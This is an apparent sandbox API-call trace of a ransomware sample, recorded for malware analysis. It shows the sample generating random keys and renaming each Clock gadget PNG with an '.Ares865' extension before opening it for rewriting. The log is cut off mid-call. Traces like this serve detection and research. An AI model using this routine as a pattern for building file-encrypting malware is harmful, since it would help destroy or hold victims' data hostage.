1 [0118.979] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_s.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.979] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3038) returned 1 [0118.979] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.980] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.980] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.983] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.984] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.984] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.984] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_settings.png.Ares865") returned 94 [0118.984] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_settings.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_settings.png.ares865"), dwFlags=0x1) returned 1 [0118.986] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\modern_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\modern_settings.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.987] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=20945) returned 1 [0118.987] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.988] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.988] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.991] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0118.992] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0118.992] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0118.993] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty.png.Ares865") returned 86 [0118.993] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty.png.ares865"), dwFlags=0x1) returned 1 [0118.994] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0118.994] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=25608) returned 1 [0118.995] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0118.995] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0118.995] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.001] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.002] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.002] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.003] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_dot.png.Ares865") returned 90 [0119.003] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_dot.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_dot.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_dot.png.ares865"), dwFlags=0x1) returned 1 [0119.005] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_dot.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_dot.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.005] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2903) returned 1 [0119.005] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.006] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.006] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.010] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.011] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.011] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.011] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_h.png.Ares865") returned 88 [0119.011] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_h.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_h.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_h.png.ares865"), dwFlags=0x1) returned 1 [0119.013] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_h.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_h.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.013] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2959) returned 1 [0119.013] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.014] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.014] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.020] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.021] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.021] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.021] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_m.png.Ares865") returned 88 [0119.021] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_m.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_m.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_m.png.ares865"), dwFlags=0x1) returned 1 [0119.023] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_m.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_m.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.023] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2979) returned 1 [0119.024] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.024] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.024] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.027] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.027] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.027] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.028] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_s.png.Ares865") returned 88 [0119.028] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_s.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_s.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_s.png.ares865"), dwFlags=0x1) returned 1 [0119.029] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_s.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_s.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.029] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2919) returned 1 [0119.030] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.030] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.030] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.032] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.033] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.033] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.034] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_settings.png.Ares865") returned 95 [0119.034] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_settings.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_settings.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_settings.png.ares865"), dwFlags=0x1) returned 1 [0119.036] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\novelty_settings.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\novelty_settings.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.036] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28718) returned 1 [0119.036] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.037] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.037] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.040] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.040] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.040] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.041] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_bottom.png.Ares865") returned 98 [0119.041] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_bottom.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_bottom.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_bottom.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_bottom.png.ares865"), dwFlags=0x1) returned 1 [0119.043] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_bottom.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_bottom.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.043] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=140) returned 1 [0119.043] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.044] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.044] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.048] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.048] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.048] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.049] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_left.png.Ares865") returned 104 [0119.049] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_divider_left.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_divider_left.png.ares865"), dwFlags=0x1) returned 1 [0119.050] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_divider_left.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.050] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=135) returned 1 [0119.051] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.051] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.051] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.054] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.054] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.055] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.055] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_right.png.Ares865") returned 105 [0119.055] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_divider_right.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_divider_right.png.ares865"), dwFlags=0x1) returned 1 [0119.056] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_divider_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_divider_right.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.056] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=135) returned 1 [0119.057] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.057] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.057] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.060] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.060] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.060] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.061] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_left.png.Ares865") returned 96 [0119.061] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_left.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_left.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_left.png.ares865"), dwFlags=0x1) returned 1 [0119.062] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_left.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_left.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.062] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=137) returned 1 [0119.063] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.063] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.063] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.066] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.067] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.067] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.067] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_right.png.Ares865") returned 97 [0119.067] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_right.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_right.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_right.png.ares865"), dwFlags=0x1) returned 1 [0119.068] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_right.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_right.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.069] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=137) returned 1 [0119.069] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.070] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.070] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.074] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.075] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0119.075] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.076] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_top.png.Ares865") returned 95 [0119.076] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_top.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_top.png"), lpNewFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_top.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_top.png.ares865"), dwFlags=0x1) returned 1 [0119.077] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\settings_box_top.png.Ares865" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\clock.gadget\\images\\settings_box_top.png.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0119.077] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=137) returned 1 [0119.077] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0119.078] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0119.078] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0119.081] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0119.081] CryptGenRandom (in: 